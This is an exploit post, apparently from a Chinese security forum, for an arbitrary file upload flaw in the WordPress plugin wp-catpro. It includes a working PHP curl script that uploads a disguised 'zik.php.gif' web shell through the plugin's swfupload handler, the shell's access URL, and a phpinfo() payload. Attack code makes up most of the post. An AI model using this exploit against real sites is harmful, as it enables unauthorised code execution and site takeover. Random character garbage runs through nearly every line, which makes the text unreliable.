Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
" |: i# E% d3 V#-----------------------------------------------------------------------
6 M2 J! J4 F& \$ C! f' e8 Z & S U N( E0 m5 D3 \8 t
作者 => Zikou-16: Z/ R# I& i* T6 I& _
邮箱 => zikou16x@gmail.com w+ m/ G6 \+ ]
测试系统 : Windows 7 , Backtrack 5r3
% `" {. @: O& x$ ]下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
9 s/ C3 p8 i+ Y+ q####5 l% c5 R4 ?: G. n5 l8 o
4 L- V. f0 e8 E% G2 n/ G! y( [
#=> Exploit 信息:+ ]" h. }0 J. R9 ], B) q
------------------3 T8 h: N8 g+ }9 [
# 攻击者可以上传 file/shell.php.gif4 h1 B# o3 V' [# R
# ("jpg", "gif", "png") // Allowed file extensions
, s# \2 f8 C: x+ Z# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)1 _/ O- e" O: W
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
$ `$ [' J# M: q+ `+ @, H( C. L------------------
& l: O; `4 W; U/ }- t; M
9 T' W0 d3 p" q0 K& ~#=> Exploit0 T5 ~3 t) b% C2 q: E W$ q) ]5 U
-----------
. {* h# U; `$ p* ]7 `9 X<?php
' v, P( f0 B$ P; n& f
, e9 {4 T6 s* n+ t8 x" |$uploadfile="zik.php.gif";) ?. K2 _* F$ p0 {: U1 v
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");9 r0 ?( F1 c6 e" A( s( O1 }* [ P
curl_setopt($ch, CURLOPT_POST, true);3 F3 u' ?* Q! Y5 Z9 u
curl_setopt($ch, CURLOPT_POSTFIELDS,% P+ v w V( O9 W& m9 B
array('Filedata'=>"@$uploadfile",+ Q Z" L K% e6 F& s1 N- G
'folder'=>'/wp-content/uploads/catpro/'));$ E- `4 n/ ~- Z/ \& |6 {
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);# v; Z6 C( }; {4 x( O
$postResult = curl_exec($ch);
; J! g; i& a4 ~7 A$ \8 jcurl_close($ch);& F7 j# n( p9 H; a3 @% x
+ F8 Q! O: D L' N( Oprint "$postResult";
& X/ Y' f% X# m, n / \/ D, s3 C! b; s) I
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif0 b+ n6 d9 p% s* i3 ?
?>
) E2 s$ J" Y! A( j<?php6 B, j4 x, t0 [& @/ M: X
phpinfo();
4 K' V$ e9 T# F& H?> |
发表于 2013-2-27 20:12:43
收藏
支持
反对